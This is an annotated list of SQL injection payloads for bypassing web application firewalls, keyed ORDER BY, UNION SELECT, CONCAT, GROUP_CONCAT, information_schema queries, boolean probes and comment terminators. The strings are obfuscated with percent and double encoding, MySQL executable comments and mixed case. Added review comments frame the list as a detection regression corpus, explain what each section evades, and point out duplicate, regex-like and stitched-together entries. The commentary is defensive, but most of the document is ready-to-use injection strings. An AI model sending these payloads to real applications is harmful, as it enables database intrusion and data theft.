- // WAF BASED / ORDERBY
- // Review note: every entry is the two-word ORDER BY keyword with the space
- // replaced by something else: an empty comment (/**/), a "+" (decoded as a
- // space in a URL query string), or a MySQL executable comment (/*! ... */,
- // optionally with a version-number prefix such as 50000 or 12345).
- // A filter matching the literal text "order by" sees none of these, so
- // matching has to happen after URL-decoding, comment removal and case
- // folding. Where the value is passed as a bound parameter, these strings
- // are inert data whatever the filter does.
- 'ORDERBY1': txt = "/**/ORDER/**/BY/**/";
- 'ORDERBY2': txt = "/*!order*/+/*!by*/";
- 'ORDERBY3': txt = "/*!ORDER BY*/";
- 'ORDERBY4': txt = "/*!50000ORDER*//**//*!50000BY*/";
- 'ORDERBY5': txt = "/*!12345ORDER*/+/*!BY*/";
- 'ORDERBY6': txt = "/*!50000ORDER BY*/";
- 'ORDERBY7': txt = "/**/**/ORDER/**/BY/**/**/";
- 'ORDERBY8': txt = "order/**_**/by";
- //WAF BASED/ UNION
- // Review note: the entries below are spellings of UNION [ALL|DISTINCT] SELECT.
- // The variations visible here are: mixed case; single letters percent-encoded
- // (%55 = U, %53 = S, %6e = n, %6c = l); double percent-encoding (%252f decodes
- // to %2f, then to "/"); whitespace replaced by /**/, "+", parentheses or
- // encoded control bytes (%09 %0A %0b %0C %0D %a0); MySQL executable comments
- // (/*! ... */, with or without a version prefix); "#" comments (%23) ended by
- // an encoded newline; and a keyword nested inside itself (UNION40, UNION92).
- // For detection this means: decode until the value stops changing, strip
- // comments, fold case and collapse whitespace before matching, and reject the
- // request outright instead of deleting the matched keyword and continuing.
- // Data-quality notes for anyone using this list as a filter regression corpus:
- //   * exact duplicates exist, e.g. UNION5/UNION21, UNION6/UNION22,
- //     UNION13/UNION51/UNION74, UNION28/UNION97, UNION60/UNION62;
- //   * UNION71, UNION72 and UNION85 look like regular-expression patterns,
- //     not SQL;
- //   * UNION45 and UNION91 contain HTML-attribute debris (all="" sel=""), and
- //     UNION49, UNION66, UNION67 and UNION69 contain stray spaces, presumably
- //     left by an HTML sanitiser and by line wrapping on the page these were
- //     copied from.
- 'UNION1': txt = "/*!50000%55nIoN*/ /*!50000%53eLeCt*/";
- 'UNION2': txt = "%55nion(%53elect 1,2,3)";
- 'UNION3': txt = "+union+distinct+select+";
- 'UNION4': txt = "+union+distinctROW+select+";
- 'UNION5': txt = "+ #?uNiOn + #?sEleCt";
- 'UNION6': txt = "+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt";
- 'UNION7': txt = "/*!%55NiOn*/ /*!%53eLEct*/";
- 'UNION8': txt = "+un/**/ion+se/**/lect";
- 'UNION9': txt = "UNION/*&test=1*/SELECT/*&pwn=2*/";
- 'UNION10': txt = "+?UnI?On?+'SeL?ECT?";
- 'UNION11': txt = "+(UnIoN)+(SelECT)+";
- 'UNION12': txt = "+(UnI)(oN)+(SeL)(EcT)";
- 'UNION13': txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
- 'UNION14': txt = "+uni>on+sel>ect+";
- 'UNION15': txt = "%55nion(%53elect 1,2,3)-- -";
- 'UNION16': txt = "/**//*!12345UNION SELECT*//**/";
- 'UNION17': txt = "/**//*!50000UNION SELECT*//**/";
- 'UNION18': txt = "/**/UNION/**//*!50000SELECT*//**/";
- 'UNION19': txt = "/*!50000UniON SeLeCt*/";
- 'UNION20': txt = "union /*!50000%53elect*/";
- 'UNION21': txt = "+ #?uNiOn + #?sEleCt";
- 'UNION22': txt = "+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt";
- 'UNION23': txt = "/*!%55NiOn*/ /*!%53eLEct*/";
- 'UNION24': txt = "/*!u%6eion*/ /*!se%6cect*/";
- 'UNION25': txt = "+un/**/ion+se/**/lect";
- 'UNION26': txt = "uni%0bon+se%0blect";
- 'UNION27': txt = "%2f**%2funion%2f**%2fselect";
- 'UNION28': txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A";
- 'UNION29': txt = "REVERSE(noinu)+REVERSE(tceles)";
- 'UNION30': txt = "/*--*/union/*--*/select/*--*/";
- 'UNION31': txt = "union (/*!/**/ SeleCT */ 1,2,3)";
- 'UNION32': txt = "/*!union*/+/*!select*/";
- 'UNION33': txt = "union+/*!select*/";
- 'UNION34': txt = "/**/union/**/select/**/";
- 'UNION35': txt = "/**/uNIon/**/sEleCt/**/";
- 'UNION36': txt = "+%2F**/+Union/*!select*/";
- 'UNION37': txt = "/**//*!union*//**//*!select*//**/";
- 'UNION38': txt = "/*!uNIOn*/ /*!SelECt*/";
- 'UNION39': txt = "uNiOn aLl sElEcT";
- 'UNION40': txt = "UNIunionON+SELselectECT";
- 'UNION41': txt = "/**/union/*!50000select*//**/";
- 'UNION42': txt = "0%a0union%a0select%09";
- 'UNION43': txt = "%0Aunion%0Aselect%0A";
- 'UNION44': txt = "%55nion/**/%53elect";
- 'UNION45': txt = 'uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/';
- 'UNION46': txt = "%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/";
- 'UNION47': txt = "%0A%09UNION%0CSELECT%10NULL%";
- 'UNION48': txt = "/*!union*//*--*//*!all*//*--*//*!select*/";
- 'UNION49': txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C";
- 'UNION50': txt = "/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/";
- 'UNION51': txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
- 'UNION52': txt = "union+sel%0bect";
- 'UNION53': txt = "+uni*on+sel*ect+";
- 'UNION54': txt = "+#1q%0Aunion all#qa%0A#%0Aselect";
- 'UNION55': txt = "union(select (1),(2),(3),(4),(5))";
- 'UNION56': txt = "UNION(SELECT(column)FROM(table))";
- 'UNION57': txt = "%23xyz%0AUnIOn%23xyz%0ASeLecT+";
- 'UNION58': txt = "%23xyz%0A%55nIOn%23xyz%0A%53eLecT+";
- 'UNION59': txt = "union(select(1),2,3)";
- 'UNION60': txt = "union (select 1111,2222,3333)";
- 'UNION61': txt = "uNioN (/*!/**/ SeleCT */ 11)";
- 'UNION62': txt = "union (select 1111,2222,3333)";
- 'UNION63': txt = "+#1q%0AuNiOn all#qa%0A#%0AsEleCt";
- 'UNION64': txt = "/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/";
- 'UNION65': txt = "%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/";
- 'UNION66': txt = "+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+";
- 'UNION67': txt = "+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C";
- 'UNION68': txt = "/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/";
- 'UNION69': txt = "+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+";
- 'UNION70': txt = "/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/";
- 'UNION71': txt = "/union\\sselect/g";
- 'UNION72': txt = "/union\\s+select/i";
- 'UNION73': txt = "/*!UnIoN*/SeLeCT";
- 'UNION74': txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
- 'UNION75': txt = "+uni>on+sel>ect+";
- 'UNION76': txt = "+(UnIoN)+(SelECT)+";
- 'UNION77': txt = "+(UnI)(oN)+(SeL)(EcT)";
- 'UNION78': txt = "+?UnI?On?+'SeL?ECT?";
- 'UNION79': txt = "+uni on+sel ect+";
- 'UNION80': txt = "+/*!UnIoN*/+/*!SeLeCt*/+";
- 'UNION81': txt = "/*!u%6eion*/ /*!se%6cect*/";
- 'UNION82': txt = "uni%20union%20/*!select*/%20";
- 'UNION83': txt = "union%23aa%0Aselect";
- 'UNION84': txt = "/**/union/*!50000select*/";
- 'UNION85': txt = "/^****union.*$/ /^****select.*$/";
- 'UNION86': txt = "/*union*/union/*select*/select+";
- 'UNION87': txt = "/*uni X on*/union/*sel X ect*/";
- 'UNION88': txt = "+un/**/ion+sel/**/ect+";
- 'UNION89': txt = "+UnIOn%0d%0aSeleCt%0d%0a";
- 'UNION90': txt = "UNION/*&test=1*/SELECT/*&pwn=2*/";
- 'UNION91': txt = 'un?<ion sel="">+un/**/ion+se/**/lect+';
- 'UNION92': txt = "+UNunionION+SEselectLECT+";
- 'UNION93': txt = "+uni%0bon+se%0blect+";
- 'UNION94': txt = "%252f%252a*/union%252f%252a /select%252f%252a*/";
- 'UNION95': txt = "/%2A%2A/union/%2A%2A/select/%2A%2A/";
- 'UNION96': txt = "%2f**%2funion%2f**%2fselect%2f**%2f";
- 'UNION97': txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A";
- 'UNION98': txt = "/*!UnIoN*/SeLecT+";
- 'UNION99': txt = "/*!50000UnION*//*!50000SeLeCt*/";
- 'UNION100': txt = "')AnD null UNiON SeLeCt 1,2,3,4,5;%00";
- 'UNION101': txt = "')AnD null UNiON SeLeCt 1,2,3,4,5+--+";
- 'UNION102': txt = "' And True Union Select 1,2,3;%00";
- 'UNION103': txt = "' And False Union Select 1,2,3;%00";
- 'UNION104': txt = "' And True Union Select 1,2,3+--+";
- 'UNION105': txt = "' And False Union Select 1,2,3+--+";
- //WAF BASED/CONCAT
- // Review note: CONCAT() in mixed case, with an encoded control byte inside
- // or before the name (%08, %0A), inside a MySQL executable comment
- // (/*! ... */), or wrapped in unhex(hex(...)). Signatures keyed on a function
- // name need the same decode / strip-comments / fold-case normalisation as
- // keyword signatures. table_name is the argument used in these templates.
- 'CONCAT1': txt = "CoNcAt()";
- 'CONCAT2': txt = "CON%08CAT()";
- 'CONCAT3': txt = "%0AcOnCat()";
- 'CONCAT4': txt = "/**//*!12345cOnCat*/";
- 'CONCAT5': txt = "/*!50000cOnCat*/(/*!*/)";
- 'CONCAT6': txt = "unhex(hex(concat(table_name)))";
- 'CONCAT7': txt = "unhex(hex(/*!12345concat*/(table_name)))";
- 'CONCAT8': txt = "unhex(hex(/*!50000concat*/(table_name)))";
- //Group Concat
- // Review note: GROUP_CONCAT() under several disguises: mixed case, one
- // percent-encoded letter (%6f = o), MySQL executable comments around the
- // function name and/or its argument, unhex(hex(...)) wrapping, and
- // CONVERT(... USING <charset>) wrapping. The keys in this section contain a
- // space ('group_concat 1'), unlike the keys of the sections above it.
- 'group_concat 1': txt = '/*!group_concat*/()';
- 'group_concat 2': txt = 'gRoUp_cOnCAt()';
- 'group_concat 3': txt = 'group_concat(/*!*/)';
- 'group_concat 4': txt = 'group_concat(/*!12345table_name*/)';
- 'group_concat 5': txt = 'group_concat(/*!50000table_name*/)';
- 'group_concat 6': txt = '/*!group_concat*/(/*!12345table_name*/)';
- 'group_concat 7': txt = '/*!group_concat*/(/*!50000table_name*/)';
- 'group_concat 8': txt = '/*!12345group_concat*/(/*!12345table_name*/)';
- 'group_concat 9': txt = '/*!50000group_concat*/(/*!50000table_name*/)';
- 'group_concat 10': txt = '/*!GrOuP_ConCaT*/()';
- 'group_concat 11': txt = '/*!12345GroUP_ConCat*/()';
- 'group_concat 12': txt = '/*!50000gRouP_cOnCaT*/()';
- 'group_concat 13': txt = '/*!50000Gr%6fuP_c%6fnCAT*/()';
- 'group_concat 14': txt = 'unhex(hex(group_concat(table_name)))';
- 'group_concat 15': txt = 'unhex(hex(/*!group_concat*/(/*!table_name*/)))';
- 'group_concat 16': txt = 'unhex(hex(/*!12345group_concat*/(table_name)))';
- 'group_concat 17': txt = 'unhex(hex(/*!12345group_concat*/(/*!table_name*/)))';
- 'group_concat 18': txt = 'unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))';
- 'group_concat 19': txt = 'unhex(hex(/*!50000group_concat*/(table_name)))';
- 'group_concat 20': txt = 'unhex(hex(/*!50000group_concat*/(/*!table_name*/)))';
- 'group_concat 21': txt = 'unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))';
- 'group_concat 22': txt = 'convert(group_concat(table_name)+using+ascii)';
- 'group_concat 23': txt = 'convert(group_concat(/*!table_name*/)+using+ascii)';
- 'group_concat 24': txt = 'convert(group_concat(/*!12345table_name*/)+using+ascii)';
- 'group_concat 25': txt = 'convert(group_concat(/*!50000table_name*/)+using+ascii)';
- 'group_concat 26': txt = 'CONVERT(group_concat(table_name)+USING+latin1)';
- 'group_concat 27': txt = 'CONVERT(group_concat(table_name)+USING+latin2)';
- 'group_concat 28': txt = 'CONVERT(group_concat(table_name)+USING+latin3)';
- 'group_concat 29': txt = 'CONVERT(group_concat(table_name)+USING+latin4)';
- 'group_concat 30': txt = 'CONVERT(group_concat(table_name)+USING+latin5)';
- //WAF BASED/ NUMBER
- // Review note: boolean or arithmetic fragments, presumably meant to follow a
- // numeric parameter value (the page does not say). Most evaluate to false,
- // NULL or a division by zero; NUMBER9 is the exception, since (1)!=(0) is
- // true. %26%26 is an encoded "&&". A numeric parameter that is parsed as an
- // integer before it reaches the query cannot carry any of these.
- 'NUMBER1': txt = "+div+0";
- 'NUMBER2': txt = "+div false+";
- 'NUMBER3': txt = "+Having+1=0+";
- 'NUMBER4': txt = "+Having false+";
- 'NUMBER5': txt = "+and false+";
- 'NUMBER6': txt = "+and null+";
- 'NUMBER7': txt = "+AND+1=0+";
- 'NUMBER8': txt = "+and+(1)=(0)+";
- 'NUMBER9': txt = "+and+(1)!=(0)+";
- 'NUMBER10': txt = "+and+2>3+";
- 'NUMBER11': txt = "%26%26 null";
- //calculation statement
- // Review note: "or <comparison between constants>" fragments. A signature
- // written for the literal text 1=1 does not cover the arithmetic forms, so a
- // detector has to recognise any comparison whose operands are all constants.
- // The comparison is not true for every entry as written, and 'or 8' is
- // plain English rather than an SQL operator.
- 'or 1': txt = "or 1=1";
- 'or 2': txt = "or 0=0";
- 'or 3': txt = "or 25-10-5=5";
- 'or 4': txt = "or 20-5-5=10";
- 'or 5': txt = "or 25-5-5=15";
- 'or 6': txt = "or 5*5*1=25";
- 'or 7': txt = "or 10+10+5=30";
- 'or 8': txt = "Or 1 Less Than 0";
- //MOD WAF
- // Review note: "MOD WAF" presumably refers to ModSecurity; the page does not
- // say. The entries use a bare maths or spatial function call as the operand
- // of AND, so there is no comparison operator for an operator-based rule to
- // match. 'mod 6' to 'mod 9' have no leading "and".
- 'mod 1': txt = "and point(29,9)";
- 'mod 2': txt = "and mod(9,4)";
- 'mod 3': txt = "and power(5,5)";
- 'mod 4': txt = "and Radians(point(53,12))";
- 'mod 5': txt = "and polygon(point(53,12))";
- 'mod 6': txt = "Multipolygon(point(53,12))";
- 'mod 7': txt = "Linestring(point(53,12))";
- 'mod 8': txt = "Multilinestring(point(53,12))";
- 'mod 9': txt = "Geometrycollection(point(53,12))";
- //WAF BASED/ SCHEMA
- // Review note: FROM information_schema.tables / .columns clauses with each
- // keyword inside a MySQL executable comment and in mixed case. %69 is "i",
- // %54 is "T", and %252e is a double-encoded ".". SCHEMA5 appears to be two
- // templates joined without a separator ("hex table" is followed directly by
- // a second FROM). References to information_schema made by the application's
- // database account are better detected in the database's own query log,
- // which sees the statement after all decoding, than in the HTTP request.
- 'SCHEMA1': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -";
- 'SCHEMA2': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -";
- 'SCHEMA3': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -";
- 'SCHEMA4': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -";
- 'SCHEMA5': txt = "/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table";
- 'SCHEMA6': txt = "/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns";
- //WAF BASED/ FIX POINT
- // Review note: trailing fragments that end or comment out the rest of a
- // statement: the "--" forms, ";%00", and the encoded bytes %23 (#), %60 (`)
- // and %90. The same set repeats with no quote (FIX POINT1-19), a single
- // quote (20-34) and a double quote (35-49), each with zero to two closing
- // parentheses, plus balancing fragments such as and '1'='1 whose last quote
- // or parenthesis is left open. FIX POINT19, 34 and 49 are URL fragments
- // rather than SQL. For an id-style parameter, a decoded value that ends in
- // a comment marker or a NUL byte is rarely legitimate, which makes it a
- // cheap, high-signal check; with bound parameters the fragments are inert.
- 'FIX POINT1': txt = "--";
- 'FIX POINT2': txt = "-- -";
- 'FIX POINT3': txt = "--+-";
- 'FIX POINT4': txt = ")--";
- 'FIX POINT5': txt = ")-- -";
- 'FIX POINT6': txt = ")--+-";
- 'FIX POINT7': txt = "))--";
- 'FIX POINT8': txt = "))-- -";
- 'FIX POINT9': txt = "))--+-";
- 'FIX POINT10': txt = ";%00";
- 'FIX POINT11': txt = ") ;%00";
- 'FIX POINT12': txt = "));%00";
- 'FIX POINT13': txt = "%23";
- 'FIX POINT14': txt = "%60";
- 'FIX POINT15': txt = "%90";
- 'FIX POINT16': txt = "and 1=1";
- 'FIX POINT17': txt = "and '1'='1";
- 'FIX POINT18': txt = "and (1)=(1 ";
- 'FIX POINT19': txt = "php?id=(1) -- -";
- 'FIX POINT20': txt = "'--+-";
- 'FIX POINT21': txt = "')-- -";
- 'FIX POINT22': txt = "')--+-";
- 'FIX POINT23': txt = "'))-- -";
- 'FIX POINT24': txt = "'))--+-";
- 'FIX POINT25': txt = "';%00";
- 'FIX POINT26': txt = "');%00";
- 'FIX POINT27': txt = "'));%00";
- 'FIX POINT28': txt = "'%23";
- 'FIX POINT29': txt = "'%60";
- 'FIX POINT30': txt = "'%90";
- 'FIX POINT31': txt = "' and 1=1";
- 'FIX POINT32': txt = "' and '1'='1";
- 'FIX POINT33': txt = "' and (1)=(1 ";
- 'FIX POINT34': txt = "php?id=(1') -- -";
- 'FIX POINT35': txt = "\"-- -";
- 'FIX POINT36': txt = "\"--+-";
- 'FIX POINT37': txt = "\"%23";
- 'FIX POINT38': txt = "\")-- -";
- 'FIX POINT39': txt = "\")--+-";
- 'FIX POINT40': txt = "\"))--+-";
- 'FIX POINT41': txt = "\";%00";
- 'FIX POINT42': txt = "\") ;%00";
- 'FIX POINT43': txt = "\"));%00";
- 'FIX POINT44': txt = "\"%60";
- 'FIX POINT45': txt = "\"%90";
- 'FIX POINT46': txt = "\" and 1=1";
- 'FIX POINT47': txt = "\" and '1'='1";
- 'FIX POINT48': txt = "\" and (1)=(1 ";
- 'FIX POINT49': txt = "php?id=(1\") -- -";
- //FIX TAB 2
- // Review note: the two commented-out lines below show that these entries
- // were originally "case ...: ... break;" arms of a switch statement; the
- // "case" and "break" tokens are missing from the live lines on this page.
- // The commented-out FIX POINT50 value reappears as FIX POINT75, and
- // FIX POINT60 and FIX POINT61 repeat FIX POINT27 and FIX POINT26.
- //case 'FIX POINT50': txt = "and x(point(0,0)) -- -";
- // break;
- 'FIX POINT50': txt = "/*";
- 'FIX POINT51': txt = "--/*";
- 'FIX POINT52': txt = "\\--+";
- 'FIX POINT53': txt = "\\-- +";
- 'FIX POINT54': txt = "#--+";
- 'FIX POINT55': txt = "#-- -";
- 'FIX POINT56': txt = "--++";
- 'FIX POINT57': txt = "+--+";
- 'FIX POINT58': txt = "'))%23";
- 'FIX POINT59': txt = "a'))%60";
- 'FIX POINT60': txt = "'));%00";
- 'FIX POINT61': txt = "');%00";
- 'FIX POINT62': txt = "')order by 10;%00";
- //FIX TAB 3
- // Review note: mostly true/false pairs (and true / and false, or true /
- // or false) placed behind a single quote or a quote plus parenthesis, i.e.
- // the paired requests of boolean-based testing. In request logs the pairing
- // is the useful signal: the same parameter requested twice in quick
- // succession, differing only in true versus false. FIX POINT75 is the value
- // that appears commented out under the FIX TAB 2 heading.
- 'FIX POINT63': txt = "AND'1";
- 'FIX POINT64': txt = "or'1";
- 'FIX POINT65': txt = "AND1='1";
- 'FIX POINT66': txt = "and 1=0";
- 'FIX POINT67': txt = "') and true";
- 'FIX POINT68': txt = "') and false";
- 'FIX POINT69': txt = "') or true";
- 'FIX POINT70': txt = "') or false";
- 'FIX POINT71': txt = "' and true";
- 'FIX POINT72': txt = "' and false";
- 'FIX POINT73': txt = "' or true";
- 'FIX POINT74': txt = "' or false";
- 'FIX POINT75': txt = "and x(point(0,0)) -- -";